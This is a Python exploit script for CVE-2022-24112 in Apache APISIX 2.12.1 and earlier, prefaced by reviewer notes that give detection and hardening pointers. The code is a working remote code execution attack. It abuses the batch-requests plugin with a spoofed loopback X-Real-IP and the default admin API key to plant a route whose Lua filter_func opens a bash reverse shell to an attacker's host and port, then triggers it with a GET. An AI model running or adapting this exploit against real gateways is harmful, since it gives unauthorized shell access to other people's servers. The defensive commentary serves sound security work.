# Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE)
# Date: 2022-03-16
# Exploit Author: Ven3xy
# Vendor Homepage: https://apisix.apache.org/
# Version: Apache APISIX 1.3 – 2.12.1
# Tested on: CentOS 7
# CVE : CVE-2022-24112
#
# Reviewer notes -- what the script below visibly does, and what a defender
# can take from it:
#   1. It POSTs a JSON document to `apisix/batch-requests`. The single
#      pipeline entry is a PUT to `/apisix/admin/routes/index`, and the
#      headers for that inner request are supplied by the caller, including
#      `X-Real-IP: 127.0.0.1` and an `X-API-KEY`.
#   2. The route it registers has a `filter_func` whose Lua source calls
#      `os.execute`.
#   3. It then GETs the URI of the new route, which is when the gateway
#      evaluates that `filter_func`.
# Hunting / hardening pointers that follow from those three steps:
#   - log and alert on batch-requests bodies whose pipeline entries address
#     `/apisix/admin/` paths or carry their own `X-Real-IP` header;
#   - audit stored routes for unexpected entries and for `filter_func`
#     values that reference `os.execute`;
#   - the X-API-KEY used here is the admin key found in APISIX's shipped
#     default configuration (NOTE(review): confirm against your deployed
#     config) -- a deployment that replaced it does not accept this request;
#   - disable the batch-requests plugin where it is not needed, keep the
#     Admin API off untrusted networks, and move off the affected version
#     range listed above per the vendor advisory.
import sys

import requests


class color:
    """ANSI escape sequences used to colour the banner."""

    HEADER = '\033[95m'
    IMPORTANT = '\33[35m'
    NOTICE = '\033[33m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    RED = '\033[91m'
    END = '\033[0m'
    UNDERLINE = '\033[4m'
    LOGGING = '\33[34m'


color_random = [
    color.HEADER,
    color.IMPORTANT,
    color.NOTICE,
    color.OKBLUE,
    color.OKGREEN,
    color.WARNING,
    color.RED,
    color.END,
    color.UNDERLINE,
    color.LOGGING,
]


def banner():
    """Print the coloured banner: ASCII art, CVE id, author credit."""
    # Indices 6, 2 and 4 of color_random are RED, NOTICE and OKGREEN.
    # The ASCII art's original line breaks were lost when the page was
    # flattened; the string is kept exactly as it appears on the page.
    art = color_random[6] + '''\n . , _.._ * __*\./ ___ _ \./._ | _ *-+- (_][_)|_) |/'\ (/,/'\[_)|(_)| | | | \n'''
    cve_line = color_random[2] + '''\t\t(CVE-2022-24112)\n'''
    credit = color_random[4] + '''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''
    print(art + cve_line + credit)


# Both branches of the original argument check print the banner first.
banner()

if len(sys.argv) != 4:
    # The argument placeholders of this usage line appear to have been lost
    # in extraction; the script reads three positional arguments (see below).
    print("[!] Usage : ./apisix-exploit.py ")
    exit()

target_url = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]

# Values repeated across the outer headers and the pipelined inner request.
_HOST_HEADER = '127.0.0.1:8080'
_USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69'
_ADMIN_KEY = 'edd1c9f034335f136f87ad84b625c8f1'

# Headers for the POST to the batch-requests endpoint.
headers1 = {
    'Host': _HOST_HEADER,
    'User-Agent': _USER_AGENT,
    'X-API-KEY': _ADMIN_KEY,
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    # Hard-coded; not derived from the JSON body built below.
    'Content-Length': '540',
    'Connection': 'close',
}

# Headers for the follow-up GET; same as above minus Content-Length.
headers2 = {
    'Host': _HOST_HEADER,
    'User-Agent': _USER_AGENT,
    'X-API-KEY': _ADMIN_KEY,
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'Connection': 'close',
}

# Route definition sent as the body of the pipelined PUT. lhost and lport
# are concatenated into the Lua `filter_func` source with no validation.
_route_body = (
    '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},'
    '"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'
    + lhost + '/' + lport
    + ';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}'
)

json_data = {
    # Headers applied to every request in the pipeline. The caller-supplied
    # X-Real-IP makes the inner Admin API call present a loopback client
    # address, which is the check CVE-2022-24112 concerns.
    'headers': {
        'X-Real-IP': '127.0.0.1',
        'X-API-KEY': _ADMIN_KEY,
        'Content-Type': 'application/json',
    },
    'timeout': 1500,
    'pipeline': [
        {
            'path': '/apisix/admin/routes/index',
            'method': 'PUT',
            'body': _route_body,
        },
    ],
}

# verify=False turns off TLS certificate verification for both requests.
# Neither response is inspected, so the script gives no indication of
# whether the route was accepted.
response1 = requests.post(target_url + 'apisix/batch-requests', headers=headers1, json=json_data, verify=False)
response2 = requests.get(target_url + 'rms/fzxewh', headers=headers2, verify=False)